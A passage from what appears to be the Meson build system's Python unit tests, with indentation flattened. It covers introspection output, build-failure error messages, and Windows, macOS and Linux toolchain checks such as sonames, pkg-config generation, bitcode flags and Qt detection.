res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
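        # meson-info.json must exist and contain the top-level bookkeeping keys,
        # with no error recorded and build files marked as updated.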
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
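        # After setconf changes options, the on-disk intro-buildoptions.json must
        # be rewritten, including the values implied by -Dbuildtype=release.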
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
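        # Target introspection straight from meson.build should match the
        # configured build's intro-targets.json once paths and per-source
        # details are normalized below.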
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_dependencies_from_source(self):
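        # --scan-dependencies on the source tree should report every dependency()
        # call together with its required/fallback/conditional flags.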
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': False,
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
        an error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "[Vv]ersion.*string or list"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. The correct message is outputted when the .wrap file is missing for
a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# Finding a script in PATH w/o extension works and adds the interpreter
# (check only if `.PY` is in PATHEXT)
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
        # Assert the exact set so that any change to ignore_libs forces this test
        # to be updated, and the full list itself gets checked.
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
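        # Return (compatibility_version, current_version) as reported by
        # `otool -L` for the given built binary.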
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
@unittest.skipIf(is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
env = {'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2])}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
        # generated file ourselves.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
